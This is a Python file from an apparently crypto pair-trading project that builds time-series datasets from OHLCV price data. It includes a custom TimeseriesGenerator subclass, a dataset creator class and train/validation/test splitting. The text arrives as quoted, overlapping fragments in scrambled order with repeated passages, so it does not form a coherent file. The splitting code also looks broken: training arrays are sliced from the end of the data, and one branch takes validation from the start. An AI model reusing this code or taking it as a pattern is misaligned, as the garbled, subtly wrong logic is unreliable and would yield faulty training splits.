"historical data start_period = '2021-09-01 00:00:00' -> Use from this datetimeindex end_period =",
"stride, start_index, end_index, shuffle, reverse, batch_size) if len(data) != len(targets): raise ValueError('Data and",
"in gen: continue return x_data, y_data def save_dataset_arrays(self, path_filename): pass if __name__ ==",
"(self.x_Val is not None) and (self.y_Val is not None): return self.x_Val, self.y_Val def",
"axis=0).shape sample_shape = (samples.shape[-2], samples.shape[-1],) return sample_shape def __getitem__(self, index): if self.shuffle: rows",
"self.features_scaler = object self.targets_scaler = object self.train_gen = None self.val_gen = None self.test_gen",
"00:00:00', end_period='2021-12-05 23:59:59', ) dataset_1_profile = DSProfile() dsc = DSCreator(loaded_crypto_data, dataset_1_profile) dataset_1_cls =",
"__getitem__(self, index): if self.shuffle: rows = np.random.randint( self.start_index, self.end_index + 1, size=self.batch_size) else:",
"y_Test_data) # x_Test_gen = self.get_test_generator(x_Test_data, y_Test_data) \"\"\" Using generator 1 time to have",
"self.features = DataFeatures(loader) self.dataset_profile = dataset_profile self.dataset = DataSet() def split_data_df(self): df_rows =",
"of historical data end_period = '2021-12-05 23:59:59' -> Use until this datetimeindex source_directory=\"../source_root\"",
"\"__main__\": \"\"\" Usage for DataLoad class ------------------------ pairs_symbol = None -> Use all",
"datetimeindex source_directory=\"../source_root\" -> Use this directory to search timeframes directory \"\"\" loaded_crypto_data =",
"+ self.dataset_profile.gap_timeframes + val_len, :] x_Test_data = x_arr[x_arr.shape[0] - test_len:, :] y_Train_data =",
"overlap=self.dataset_profile.tsg_overlap, ) return self.dataset.val_gen def get_test_generator(self, x_Test_data, y_Test_data): self.dataset.test_gen = TSDataGenerator(data=x_Test_data, targets=y_Test_data, length=self.dataset_profile.tsg_window_length,",
"= targets self.length = length self.sampling_rate = sampling_rate self.stride = stride self.start_index =",
"= self.calc_shape() pass def calc_shape(self): index = 0 i = (self.start_index + self.batch_size",
"end_period = '2021-12-05 23:59:59' -> Use until this datetimeindex source_directory=\"../source_root\" -> Use this",
"self.dataset_profile.Y_data == \"power_trend\": weight = self.dataset.dataset_profile.power_trend self.dataset.y_df = self.features.create_power_trend(weight) self.create_power_trend() return self.dataset else:",
"self.dataset.train_gen def get_val_generator(self, x_Val_data, y_Val_data): self.dataset.val_gen = TSDataGenerator(data=x_Val_data, targets=y_Val_data, length=self.dataset_profile.tsg_window_length, sampling_rate=self.dataset_profile.tsg_sampling_rate, stride=self.dataset_profile.tsg_stride, start_index=self.dataset_profile.tsg_start_index,",
"np.random.randint( self.start_index, self.end_index + 1, size=self.batch_size) else: i = (self.start_index + self.batch_size *",
"as current step.' % (self.start_index, self.end_index)) self.sample_shape = self.calc_shape() pass def calc_shape(self): index",
"sys.exit(msg) x_arr = self.dataset.features_scaler.transform(self.dataset.features_df.values) \"\"\" check \"\"\" y_arr = self.dataset.y_df.values self.prepare_datagens(x_arr, y_arr) pass",
"to have solid data \"\"\" self.dataset.x_Test, self.dataset.y_Test = self.create_data_from_gen(x_Test_data, y_Test_data) # x_Test_gen =",
"Use only this pairs to load time_intervals = None -> Use all timeframes",
"loader (DataLoad): object with data Returns: DSCreator (class): object \"\"\" self.features = DataFeatures(loader)",
"shuffle self.reverse = reverse self.batch_size = batch_size self.sample_shape = None if self.start_index >",
"self.dataset.val_df = self.dataset.features_df.iloc[ df_train_len + self.dataset_profile.gap_timeframes: df_val_len + df_train_len + self.dataset_profile.gap_timeframes, :] self.dataset.test_df",
"TSDataGenerator(TimeseriesGenerator): def __init__(self, data, targets, length, sampling_rate=1, stride=1, start_index=0, overlap=0, end_index=None, shuffle=False, reverse=False,",
"while target length is {}'.format(len(targets))) if overlap >= length: raise ValueError(f'`overlap={overlap} >= length={length}`",
"in rows]) if self.reverse: return samples[:, ::-1, ...], targets return samples, targets @dataclass",
"self.features.collect_features(self.dataset_profile) self.dataset.name = f'{self.dataset_profile.use_symbols_pairs[0]}-{self.dataset_profile.use_symbols_pairs[1]}-{self.dataset_profile.timeframe}' if self.dataset_profile.Y_data == \"close1-close2\": self.dataset.y_df = self.features.create_y_close1_close2_sub() elif self.dataset_profile.Y_data",
"if overlap >= length: raise ValueError(f'`overlap={overlap} >= length={length}` is disallowed') if overlap >",
"= overlap if end_index is None: end_index = len(data) - 1 self.end_index =",
":] y_Train_data = y_arr[train_len:, :] y_Val_data = y_arr[train_len + self.dataset_profile.gap_timeframes:train_len + self.dataset_profile.gap_timeframes +",
"y_Train_data = y_arr[train_len:, :] y_Val_data = y_arr[train_len + self.dataset_profile.gap_timeframes:train_len + self.dataset_profile.gap_timeframes + val_len,",
"None): return self.x_Test, self.y_Test class DSCreator: \"\"\" Class for dataset creation for dataset",
"self.dataset.dataset_profile.power_trend self.dataset.y_df = self.features.create_power_trend(weight) self.create_power_trend() return self.dataset else: msg = \"Error: Unknown dataset",
"= f'{self.dataset_profile.use_symbols_pairs[0]}-{self.dataset_profile.use_symbols_pairs[1]}-{self.dataset_profile.timeframe}' if self.dataset_profile.Y_data == \"close1-close2\": self.dataset.y_df = self.features.create_y_close1_close2_sub() elif self.dataset_profile.Y_data == \"close1-close2_trend\":",
"y_arr = self.dataset.targets_scaler.transform(y_temp) self.prepare_datagens(x_arr, y_arr) return self.dataset def create_data_from_gen(self, x_arr, y_arr): gen =",
"= self.create_data_from_gen(x_Test_data, y_Test_data) # x_Test_gen = self.get_test_generator(x_Test_data, y_Test_data) \"\"\" Using generator 1 time",
"historical data end_period = '2021-12-05 23:59:59' -> Use until this datetimeindex source_directory=\"../source_root\" ->",
"length=self.dataset_profile.tsg_window_length, sampling_rate=self.dataset_profile.tsg_sampling_rate, stride=self.dataset_profile.tsg_stride, start_index=self.dataset_profile.tsg_start_index, overlap=self.dataset_profile.tsg_overlap, ) return self.dataset.test_gen def create_close1_close2_power(self): if self.dataset_profile.scaler ==",
"in timeframe directory pairs_symbol = (\"BTCUSDT\", \"ETHUSDT\") -> Use only this pairs to",
"-> Use until [:-1] of historical data end_period = '2021-12-05 23:59:59' -> Use",
"stride=self.dataset_profile.tsg_stride, start_index=self.dataset_profile.tsg_start_index, overlap=self.dataset_profile.tsg_overlap, ) return self.dataset.val_gen def get_test_generator(self, x_Test_data, y_Test_data): self.dataset.test_gen = TSDataGenerator(data=x_Test_data,",
"\"\"\" y_arr = self.dataset.targets_scaler.transform(y_temp) self.prepare_datagens(x_arr, y_arr) return self.dataset def create_data_from_gen(self, x_arr, y_arr): gen",
"= DSProfile() self.features_df = None self.y_df = None self.x_Train = None self.y_Train =",
"<reponame>AI-Traiding-Team/paired_trading import os import sys import time import copy import pytz import numpy",
"length is {}'.format(len(targets))) if overlap >= length: raise ValueError(f'`overlap={overlap} >= length={length}` is disallowed')",
"self.length:row:self.sampling_rate] for row in rows]) # self.sample_shape = np.expand_dims(samples, axis=0).shape sample_shape = (samples.shape[-2],",
"def prepare_datagens(self, x_arr, y_arr): train_len, val_len, test_len = self.split_data_df() if test_len is None:",
"self.dataset.name = f'{self.dataset_profile.use_symbols_pairs[0]}-{self.dataset_profile.use_symbols_pairs[1]}-{self.dataset_profile.timeframe}' if self.dataset_profile.Y_data == \"close1-close2\": self.dataset.y_df = self.features.create_y_close1_close2_sub() elif self.dataset_profile.Y_data ==",
"object \"\"\" self.features = DataFeatures(loader) self.dataset_profile = dataset_profile self.dataset = DataSet() def split_data_df(self):",
"...], targets return samples, targets @dataclass class DataSet: def __init__(self): self.name: str =",
"+ self.dataset_profile.gap_timeframes, :] else: x_Train_data = x_arr[train_len:, :] x_Val_data = x_arr[train_len + self.dataset_profile.gap_timeframes:train_len",
"@dataclass class DataSet: def __init__(self): self.name: str = '' self.dataset_profile = DSProfile() self.features_df",
"x_arr[train_len + self.dataset_profile.gap_timeframes:train_len + self.dataset_profile.gap_timeframes + val_len, :] x_Test_data = x_arr[x_arr.shape[0] - test_len:,",
"self.dataset.x_Test, self.dataset.y_Test = self.create_data_from_gen(x_Test_data, y_Test_data) # x_Test_gen = self.get_test_generator(x_Test_data, y_Test_data) \"\"\" Using generator",
"as sns import tensorflow as tf from dataclasses import dataclass from analyze.dataload import",
"timeframe directory pairs_symbol = (\"BTCUSDT\", \"ETHUSDT\") -> Use only this pairs to load",
"for dataset configuration we are using DSConstants dataclass (profile) \"\"\" def __init__(self, loader:",
"overlap=self.dataset_profile.tsg_overlap, batch_size=x_arr.shape[0] ) for x_data, y_data in gen: continue return x_data, y_data def",
"' 'Data length is {}'.format(len(data)) + ' while target length is {}'.format(len(targets))) if",
"\"\"\" check \"\"\" y_arr = self.dataset.y_df.values self.prepare_datagens(x_arr, y_arr) pass def prepare_datagens(self, x_arr, y_arr):",
"y_Train_data) x_Val_gen = self.get_val_generator(x_Val_data, y_Val_data) self.dataset.x_Train, self.dataset.y_Train = self.create_data_from_gen(x_Train_data, y_Train_data) self.dataset.x_Val, self.dataset.y_Val =",
"y_Val_data) self.dataset.input_shape = x_Val_gen.sample_shape pass def create_dataset(self) -> DataSet: self.dataset.dataset_profile = DSProfile() self.dataset.features_df",
"def get_train_generator(self, x_Train_data, y_Train_data): self.dataset.train_gen = TSDataGenerator(data=x_Train_data, targets=y_Train_data, length=self.dataset_profile.tsg_window_length, sampling_rate=self.dataset_profile.tsg_sampling_rate, stride=self.dataset_profile.tsg_stride, start_index=self.dataset_profile.tsg_start_index, overlap=self.dataset_profile.tsg_overlap,",
"self.dataset def create_data_from_gen(self, x_arr, y_arr): gen = TSDataGenerator(data=x_arr, targets=y_arr, length=self.dataset_profile.tsg_window_length, sampling_rate=self.dataset_profile.tsg_sampling_rate, stride=self.dataset_profile.tsg_stride, start_index=self.dataset_profile.tsg_start_index,",
"loader: DataLoad, dataset_profile: DSProfile): \"\"\" Getting object with OHLCV data (symbols and timeframes).",
"= dataset_profile self.dataset = DataSet() def split_data_df(self): df_rows = self.dataset.features_df.shape[0] df_train_len = int(df_rows",
"datetimeindex end_period = None -> Use until [:-1] of historical data end_period =",
"= 0.0010 def get_local_timezone_name(): if time.daylight: offset_hour = time.altzone / 3600 else: offset_hour",
"and (self.y_Val is not None): return self.x_Val, self.y_Val def get_test(self): if (self.x_Test is",
"if self.dataset_profile.scaler == \"robust\": self.dataset.features_scaler = RobustScaler().fit(self.dataset.features_df.values) self.dataset.targets_scaler = None else: msg =",
"same length. ' 'Data length is {}'.format(len(data)) + ' while target length is",
"1), self.stride) samples = np.array([self.data[row - self.overlap - self.length:row:self.sampling_rate] for row in rows])",
"return self.x_Train, self.y_Train def get_val(self): if (self.x_Val is not None) and (self.y_Val is",
"DataLoad(pairs_symbols=None, time_intervals=['15m'], source_directory=\"../source_root\", start_period='2021-11-01 00:00:00', end_period='2021-12-05 23:59:59', ) dataset_1_profile = DSProfile() dsc =",
"are using DSConstants dataclass (profile) \"\"\" def __init__(self, loader: DataLoad, dataset_profile: DSProfile): \"\"\"",
"return self.dataset elif self.dataset_profile.Y_data == \"close1-close2_power\": self.dataset.y_df = self.features.create_y_close1_close2_sub_power() self.create_close1_close2_power() return self.dataset elif",
"return df_train_len, df_val_len, df_test_len def get_train_generator(self, x_Train_data, y_Train_data): self.dataset.train_gen = TSDataGenerator(data=x_Train_data, targets=y_Train_data, length=self.dataset_profile.tsg_window_length,",
"RobustScaler().fit(self.dataset.features_df.values) self.dataset.targets_scaler = None else: msg = \"Error: Unknown scaler preparation type\" sys.exit(msg)",
"self.dataset.train_gen = TSDataGenerator(data=x_Train_data, targets=y_Train_data, length=self.dataset_profile.tsg_window_length, sampling_rate=self.dataset_profile.tsg_sampling_rate, stride=self.dataset_profile.tsg_stride, start_index=self.dataset_profile.tsg_start_index, overlap=self.dataset_profile.tsg_overlap, ) return self.dataset.train_gen def",
"f\"+{offset_hour:.0f}\" return f'Etc/GMT{offset_hour_msg}' class TSDataGenerator(TimeseriesGenerator): def __init__(self, data, targets, length, sampling_rate=1, stride=1, start_index=0,",
"self.dataset.y_Train = self.create_data_from_gen(x_Train_data, y_Train_data) self.dataset.x_Val, self.dataset.y_Val = self.create_data_from_gen(x_Val_data, y_Val_data) self.dataset.input_shape = x_Val_gen.sample_shape pass",
"if self.shuffle: rows = np.random.randint( self.start_index, self.end_index + 1, size=self.batch_size) else: i =",
"be used as current step.' % (self.start_index, self.end_index)) self.sample_shape = self.calc_shape() pass def",
"gen = TSDataGenerator(data=x_arr, targets=y_arr, length=self.dataset_profile.tsg_window_length, sampling_rate=self.dataset_profile.tsg_sampling_rate, stride=self.dataset_profile.tsg_stride, start_index=self.dataset_profile.tsg_start_index, overlap=self.dataset_profile.tsg_overlap, batch_size=x_arr.shape[0] ) for x_data,",
"return self.dataset def create_data_from_gen(self, x_arr, y_arr): gen = TSDataGenerator(data=x_arr, targets=y_arr, length=self.dataset_profile.tsg_window_length, sampling_rate=self.dataset_profile.tsg_sampling_rate, stride=self.dataset_profile.tsg_stride,",
"only this pairs to load time_intervals = None -> Use all timeframes directories",
"def create_power_trend(self): if self.dataset_profile.scaler == \"robust\": self.dataset.features_scaler = RobustScaler().fit(self.dataset.features_df.values) self.dataset.targets_scaler = None else:",
"= RobustScaler().fit(self.dataset.features_df.values) self.dataset.targets_scaler = RobustScaler().fit(y_temp) else: msg = \"Error: Unknown scaler preparation type\"",
"self.dataset = DataSet() def split_data_df(self): df_rows = self.dataset.features_df.shape[0] df_train_len = int(df_rows * self.dataset_profile.train_size)",
"pairs in timeframe directory pairs_symbol = (\"BTCUSDT\", \"ETHUSDT\") -> Use only this pairs",
"= time.timezone / 3600 offset_hour_msg = f\"{offset_hour:.0f}\" if offset_hour > 0: offset_hour_msg =",
"start_index + length self.overlap = overlap if end_index is None: end_index = len(data)",
"self.train_gen = None self.val_gen = None self.test_gen = None self.input_shape = None pass",
"self.dataset elif self.dataset_profile.Y_data == \"power_trend\": weight = self.dataset.dataset_profile.power_trend self.dataset.y_df = self.features.create_power_trend(weight) self.create_power_trend() return",
"df_rows - (df_train_len + self.dataset_profile.gap_timeframes) self.dataset.train_df = self.dataset.features_df.iloc[:df_train_len, :] if self.dataset_profile.train_size + self.dataset_profile.val_size",
"start_index=self.dataset_profile.tsg_start_index, overlap=self.dataset_profile.tsg_overlap, ) return self.dataset.val_gen def get_test_generator(self, x_Test_data, y_Test_data): self.dataset.test_gen = TSDataGenerator(data=x_Test_data, targets=y_Test_data,",
"'' self.dataset_profile = DSProfile() self.features_df = None self.y_df = None self.x_Train = None",
"y_Val_data) self.dataset.x_Train, self.dataset.y_Train = self.create_data_from_gen(x_Train_data, y_Train_data) self.dataset.x_Val, self.dataset.y_Val = self.create_data_from_gen(x_Val_data, y_Val_data) self.dataset.input_shape =",
"start_index=self.dataset_profile.tsg_start_index, overlap=self.dataset_profile.tsg_overlap, batch_size=x_arr.shape[0] ) for x_data, y_data in gen: continue return x_data, y_data",
"y_data def save_dataset_arrays(self, path_filename): pass if __name__ == \"__main__\": \"\"\" Usage for DataLoad",
"prepare_datagens(self, x_arr, y_arr): train_len, val_len, test_len = self.split_data_df() if test_len is None: x_Train_data",
"= data self.targets = targets self.length = length self.sampling_rate = sampling_rate self.stride =",
"= None self.val_gen = None self.test_gen = None self.input_shape = None pass def",
"rows = np.arange(i, min(i + self.batch_size * self.stride, self.end_index + 1), self.stride) samples",
"None self.x_Test = None self.y_Test = None self.features_scaler = object self.targets_scaler = object",
"x_Val_gen = self.get_val_generator(x_Val_data, y_Val_data) self.dataset.x_Train, self.dataset.y_Train = self.create_data_from_gen(x_Train_data, y_Train_data) self.dataset.x_Val, self.dataset.y_Val = self.create_data_from_gen(x_Val_data,",
"return samples, targets @dataclass class DataSet: def __init__(self): self.name: str = '' self.dataset_profile",
"stride self.start_index = start_index + length self.overlap = overlap if end_index is None:",
"\"\"\" def __init__(self, loader: DataLoad, dataset_profile: DSProfile): \"\"\" Getting object with OHLCV data",
"def __init__(self, loader: DataLoad, dataset_profile: DSProfile): \"\"\" Getting object with OHLCV data (symbols",
"'2021-12-05 23:59:59' -> Use until this datetimeindex source_directory=\"../source_root\" -> Use this directory to",
"x_data, y_data def save_dataset_arrays(self, path_filename): pass if __name__ == \"__main__\": \"\"\" Usage for",
"df_rows - (df_train_len + self.dataset_profile.gap_timeframes) - (df_val_len + self.dataset_profile.gap_timeframes) self.dataset.val_df = self.dataset.features_df.iloc[ df_train_len",
"(df_val_len + self.dataset_profile.gap_timeframes) self.dataset.val_df = self.dataset.features_df.iloc[ df_train_len + self.dataset_profile.gap_timeframes: df_val_len + df_train_len +",
"None: end_index = len(data) - 1 self.end_index = end_index self.shuffle = shuffle self.reverse",
"self.dataset.y_df.values self.prepare_datagens(x_arr, y_arr) pass def create_close1_close2_trend(self): if self.dataset_profile.scaler == \"robust\": self.dataset.features_scaler = RobustScaler().fit(self.dataset.features_df.values)",
"+ ' while target length is {}'.format(len(targets))) if overlap >= length: raise ValueError(f'`overlap={overlap}",
"self.dataset.targets_scaler.transform(y_temp) self.prepare_datagens(x_arr, y_arr) return self.dataset def create_data_from_gen(self, x_arr, y_arr): gen = TSDataGenerator(data=x_arr, targets=y_arr,",
"pandas as pd from typing import Tuple from sklearn.preprocessing import StandardScaler from sklearn.preprocessing",
"length. ' 'Data length is {}'.format(len(data)) + ' while target length is {}'.format(len(targets)))",
"return df_train_len, df_val_len, None else: df_val_len = int(df_rows * self.dataset_profile.val_size) df_test_len = df_rows",
"= x_arr[train_len:, :] x_Val_data = x_arr[train_len + self.dataset_profile.gap_timeframes:train_len + self.dataset_profile.gap_timeframes + val_len, :]",
"self.get_test_generator(x_Test_data, y_Test_data) \"\"\" Using generator 1 time to have solid data \"\"\" x_Train_gen",
"scaler preparation type\" sys.exit(msg) x_arr = self.dataset.features_scaler.transform(self.dataset.features_df.values) \"\"\" check \"\"\" y_arr = self.dataset.targets_scaler.transform(y_temp)",
"= None -> Use all timeframes directories for loading (with pairs_symbols) time_intervals =",
"offset_hour = time.timezone / 3600 offset_hour_msg = f\"{offset_hour:.0f}\" if offset_hour > 0: offset_hour_msg",
"i = (self.start_index + self.batch_size * self.stride * index) rows = np.arange(i, min(i",
"to have solid data \"\"\" x_Train_gen = self.get_train_generator(x_Train_data, y_Train_data) x_Val_gen = self.get_val_generator(x_Val_data, y_Val_data)",
"overlap=self.dataset_profile.tsg_overlap, ) return self.dataset.test_gen def create_close1_close2_power(self): if self.dataset_profile.scaler == \"robust\": self.dataset.features_scaler = RobustScaler().fit(self.dataset.features_df.values)",
"= y_arr[train_len + self.dataset_profile.gap_timeframes:train_len + self.dataset_profile.gap_timeframes + val_len, :] y_Test_data = y_arr[x_arr.shape[0] -",
">= length={length}` is disallowed') if overlap > 0: start_index += overlap self.data =",
"return self.x_Val, self.y_Val def get_test(self): if (self.x_Test is not None) and (self.y_Test is",
"\"\"\" check \"\"\" y_arr = self.dataset.y_df.values self.prepare_datagens(x_arr, y_arr) pass def create_power_trend(self): if self.dataset_profile.scaler",
"y_arr): train_len, val_len, test_len = self.split_data_df() if test_len is None: x_Train_data = x_arr[train_len:,",
"= y_arr[train_len:, :] y_Val_data = y_arr[train_len + self.dataset_profile.gap_timeframes:train_len + self.dataset_profile.gap_timeframes + val_len, :]",
"= self.dataset.features_df.iloc[:df_train_len, :] if self.dataset_profile.train_size + self.dataset_profile.val_size == 1.0: self.dataset.val_df = self.dataset.features_df.iloc[df_train_len +",
"and timeframes). All data with chosen period loaded to memory Args: loader (DataLoad):",
"self.dataset.features_scaler.transform(self.dataset.features_df.values) \"\"\" check \"\"\" y_arr = self.dataset.targets_scaler.transform(y_temp) self.prepare_datagens(x_arr, y_arr) return self.dataset def create_data_from_gen(self,",
"None -> Use from [0:] of historical data start_period = '2021-09-01 00:00:00' ->",
"== \"robust\": self.dataset.features_scaler = RobustScaler().fit(self.dataset.features_df.values) self.dataset.targets_scaler = None else: msg = \"Error: Unknown",
"(self.start_index, self.end_index)) self.sample_shape = self.calc_shape() pass def calc_shape(self): index = 0 i =",
"Getting object with OHLCV data (symbols and timeframes). All data with chosen period",
"+ self.dataset_profile.gap_timeframes:train_len + self.dataset_profile.gap_timeframes + val_len, :] y_Test_data = y_arr[x_arr.shape[0] - test_len:, :]",
"overlap if end_index is None: end_index = len(data) - 1 self.end_index = end_index",
"have solid data \"\"\" x_Train_gen = self.get_train_generator(x_Train_data, y_Train_data) x_Val_gen = self.get_val_generator(x_Val_data, y_Val_data) self.dataset.x_Train,",
"= DataLoad(pairs_symbols=None, time_intervals=['15m'], source_directory=\"../source_root\", start_period='2021-11-01 00:00:00', end_period='2021-12-05 23:59:59', ) dataset_1_profile = DSProfile() dsc",
"= DataSet() def split_data_df(self): df_rows = self.dataset.features_df.shape[0] df_train_len = int(df_rows * self.dataset_profile.train_size) df_val_len",
":] return df_train_len, df_val_len, df_test_len def get_train_generator(self, x_Train_data, y_Train_data): self.dataset.train_gen = TSDataGenerator(data=x_Train_data, targets=y_Train_data,",
"= \"Error: Unknown scaler preparation type\" sys.exit(msg) x_arr = self.dataset.features_scaler.transform(self.dataset.features_df.values) \"\"\" check \"\"\"",
"self.dataset.y_df = self.features.create_y_close1_close2_sub_power() self.create_close1_close2_power() return self.dataset elif self.dataset_profile.Y_data == \"power_trend\": weight = self.dataset.dataset_profile.power_trend",
"elif self.dataset_profile.Y_data == \"power_trend\": weight = self.dataset.dataset_profile.power_trend self.dataset.y_df = self.features.create_power_trend(weight) self.create_power_trend() return self.dataset",
"all pairs in timeframe directory pairs_symbol = (\"BTCUSDT\", \"ETHUSDT\") -> Use only this",
"1 time to have solid data \"\"\" x_Train_gen = self.get_train_generator(x_Train_data, y_Train_data) x_Val_gen =",
"None -> Use until [:-1] of historical data end_period = '2021-12-05 23:59:59' ->",
"3600 else: offset_hour = time.timezone / 3600 offset_hour_msg = f\"{offset_hour:.0f}\" if offset_hour >",
"with OHLCV data (symbols and timeframes). All data with chosen period loaded to",
"- self.overlap - self.length:row:self.sampling_rate] for row in rows]) # self.sample_shape = samples.shape targets",
"self.end_index = end_index self.shuffle = shuffle self.reverse = reverse self.batch_size = batch_size self.sample_shape",
"len(targets): raise ValueError('Data and targets have to be' + ' of same length.",
"raise ValueError('`start_index+length=%i > end_index=%i` ' 'is disallowed, as no part of the sequence",
"class DSCreator: \"\"\" Class for dataset creation for dataset configuration we are using",
"__init__(self, data, targets, length, sampling_rate=1, stride=1, start_index=0, overlap=0, end_index=None, shuffle=False, reverse=False, batch_size=128): super().__init__(data,",
"from this datetimeindex end_period = None -> Use until [:-1] of historical data",
"len(data) - 1 self.end_index = end_index self.shuffle = shuffle self.reverse = reverse self.batch_size",
"self.targets_scaler = object self.train_gen = None self.val_gen = None self.test_gen = None self.input_shape",
"def calc_shape(self): index = 0 i = (self.start_index + self.batch_size * self.stride *",
"= self.dataset.targets_scaler.transform(y_temp) self.prepare_datagens(x_arr, y_arr) return self.dataset def create_data_from_gen(self, x_arr, y_arr): gen = TSDataGenerator(data=x_arr,",
"def get_test_generator(self, x_Test_data, y_Test_data): self.dataset.test_gen = TSDataGenerator(data=x_Test_data, targets=y_Test_data, length=self.dataset_profile.tsg_window_length, sampling_rate=self.dataset_profile.tsg_sampling_rate, stride=self.dataset_profile.tsg_stride, start_index=self.dataset_profile.tsg_start_index, overlap=self.dataset_profile.tsg_overlap,",
"= y_arr[train_len:, :] y_Val_data = y_arr[:train_len + self.dataset_profile.gap_timeframes, :] else: x_Train_data = x_arr[train_len:,",
"to search timeframes directory \"\"\" loaded_crypto_data = DataLoad(pairs_symbols=None, time_intervals=['15m'], source_directory=\"../source_root\", start_period='2021-11-01 00:00:00', end_period='2021-12-05",
"None self.x_Val = None self.y_Val = None self.x_Test = None self.y_Test = None",
"is not None) and (self.y_Test is not None): return self.x_Test, self.y_Test class DSCreator:",
"self.dataset.features_df.iloc[df_train_len + self.dataset_profile.gap_timeframes:, :] return df_train_len, df_val_len, None else: df_val_len = int(df_rows *",
"msg = \"Error: Unknown dataset preparation type\" sys.exit(msg) self.dataset.name = f'{self.dataset_profile.use_symbols_pairs[0]}-{self.dataset_profile.use_symbols_pairs[1]}-{self.dataset_profile.timeframe}' y_temp =",
"dataset_profile: DSProfile): \"\"\" Getting object with OHLCV data (symbols and timeframes). All data",
"+ self.batch_size * self.stride * index) rows = np.arange(i, min(i + self.batch_size *",
"x_arr = self.dataset.features_scaler.transform(self.dataset.features_df.values) \"\"\" check \"\"\" y_arr = self.dataset.y_df.values self.prepare_datagens(x_arr, y_arr) pass def",
"= self.get_train_generator(x_Train_data, y_Train_data) x_Val_gen = self.get_val_generator(x_Val_data, y_Val_data) self.dataset.x_Train, self.dataset.y_Train = self.create_data_from_gen(x_Train_data, y_Train_data) self.dataset.x_Val,",
"def get_local_timezone_name(): if time.daylight: offset_hour = time.altzone / 3600 else: offset_hour = time.timezone",
"end_index=%i` ' 'is disallowed, as no part of the sequence ' 'would be",
"samples, targets @dataclass class DataSet: def __init__(self): self.name: str = '' self.dataset_profile =",
"for row in rows]) if self.reverse: return samples[:, ::-1, ...], targets return samples,",
"(self.y_Test is not None): return self.x_Test, self.y_Test class DSCreator: \"\"\" Class for dataset",
"self.create_power_trend() return self.dataset else: msg = \"Error: Unknown dataset preparation type\" sys.exit(msg) self.dataset.name",
"sklearn.preprocessing import OneHotEncoder from sklearn.preprocessing import FunctionTransformer from tensorflow.keras.preprocessing.sequence import TimeseriesGenerator import matplotlib.pyplot",
"Use timeframes from this list to load start_period = None -> Use from",
"using DSConstants dataclass (profile) \"\"\" def __init__(self, loader: DataLoad, dataset_profile: DSProfile): \"\"\" Getting",
"+ self.dataset_profile.val_size == 1.0: self.dataset.val_df = self.dataset.features_df.iloc[df_train_len + self.dataset_profile.gap_timeframes:, :] return df_train_len, df_val_len,",
"if len(data) != len(targets): raise ValueError('Data and targets have to be' + '",
"samples.shape[-1],) return sample_shape def __getitem__(self, index): if self.shuffle: rows = np.random.randint( self.start_index, self.end_index",
"# x_Test_gen = self.get_test_generator(x_Test_data, y_Test_data) \"\"\" Using generator 1 time to have solid",
"= batch_size self.sample_shape = None if self.start_index > self.end_index: raise ValueError('`start_index+length=%i > end_index=%i`",
"None self.y_Train = None self.x_Val = None self.y_Val = None self.x_Test = None",
"self.dataset_profile.val_size) df_test_len = df_rows - (df_train_len + self.dataset_profile.gap_timeframes) - (df_val_len + self.dataset_profile.gap_timeframes) self.dataset.val_df",
"= f'{self.dataset_profile.use_symbols_pairs[0]}-{self.dataset_profile.use_symbols_pairs[1]}-{self.dataset_profile.timeframe}' y_temp = self.dataset.y_df.values.reshape(-1, 1) if self.dataset_profile.scaler == \"robust\": self.dataset.features_scaler = RobustScaler().fit(self.dataset.features_df.values)",
"data self.targets = targets self.length = length self.sampling_rate = sampling_rate self.stride = stride",
"= self.dataset.features_scaler.transform(self.dataset.features_df.values) \"\"\" check \"\"\" y_arr = self.dataset.y_df.values self.prepare_datagens(x_arr, y_arr) pass def create_close1_close2_trend(self):",
"x_Test_gen = self.get_test_generator(x_Test_data, y_Test_data) \"\"\" Using generator 1 time to have solid data",
"check \"\"\" y_arr = self.dataset.y_df.values self.prepare_datagens(x_arr, y_arr) pass def prepare_datagens(self, x_arr, y_arr): train_len,",
"self.dataset.y_df.values.reshape(-1, 1) if self.dataset_profile.scaler == \"robust\": self.dataset.features_scaler = RobustScaler().fit(self.dataset.features_df.values) self.dataset.targets_scaler = RobustScaler().fit(y_temp) else:",
"= self.dataset.features_scaler.transform(self.dataset.features_df.values) \"\"\" check \"\"\" y_arr = self.dataset.targets_scaler.transform(y_temp) self.prepare_datagens(x_arr, y_arr) return self.dataset def",
"= RobustScaler().fit(y_temp) else: msg = \"Error: Unknown scaler preparation type\" sys.exit(msg) x_arr =",
"is not None): return self.x_Train, self.y_Train def get_val(self): if (self.x_Val is not None)",
"import time import copy import pytz import numpy as np import datetime import",
"self.y_df = None self.x_Train = None self.y_Train = None self.x_Val = None self.y_Val",
"= self.features.create_power_trend(weight) self.create_power_trend() return self.dataset else: msg = \"Error: Unknown dataset preparation type\"",
":] y_Test_data = y_arr[x_arr.shape[0] - test_len:, :] x_Test_gen = self.get_test_generator(x_Test_data, y_Test_data) \"\"\" Using",
"solid data \"\"\" x_Train_gen = self.get_train_generator(x_Train_data, y_Train_data) x_Val_gen = self.get_val_generator(x_Val_data, y_Val_data) self.dataset.x_Train, self.dataset.y_Train",
"= self.features.create_y_close1_close2_sub() elif self.dataset_profile.Y_data == \"close1-close2_trend\": self.dataset.y_df = self.features.create_y_close1_close2_sub_trend() self.create_close1_close2_trend() return self.dataset elif",
"time_intervals = ['15m'] -> Use timeframes from this list to load start_period =",
"[0:] of historical data start_period = '2021-09-01 00:00:00' -> Use from this datetimeindex",
"overlap >= length: raise ValueError(f'`overlap={overlap} >= length={length}` is disallowed') if overlap > 0:",
"y_Test_data = y_arr[x_arr.shape[0] - test_len:, :] x_Test_gen = self.get_test_generator(x_Test_data, y_Test_data) \"\"\" Using generator",
"object with OHLCV data (symbols and timeframes). All data with chosen period loaded",
"- test_len:, :] x_Test_gen = self.get_test_generator(x_Test_data, y_Test_data) \"\"\" Using generator 1 time to",
"x_arr[:train_len + self.dataset_profile.gap_timeframes, :] y_Train_data = y_arr[train_len:, :] y_Val_data = y_arr[:train_len + self.dataset_profile.gap_timeframes,",
"get_test(self): if (self.x_Test is not None) and (self.y_Test is not None): return self.x_Test,",
"df_test_len = df_rows - (df_train_len + self.dataset_profile.gap_timeframes) - (df_val_len + self.dataset_profile.gap_timeframes) self.dataset.val_df =",
"- self.length:row:self.sampling_rate] for row in rows]) # self.sample_shape = samples.shape targets = np.array([self.targets[row]",
"return f'Etc/GMT{offset_hour_msg}' class TSDataGenerator(TimeseriesGenerator): def __init__(self, data, targets, length, sampling_rate=1, stride=1, start_index=0, overlap=0,",
"0: start_index += overlap self.data = data self.targets = targets self.length = length",
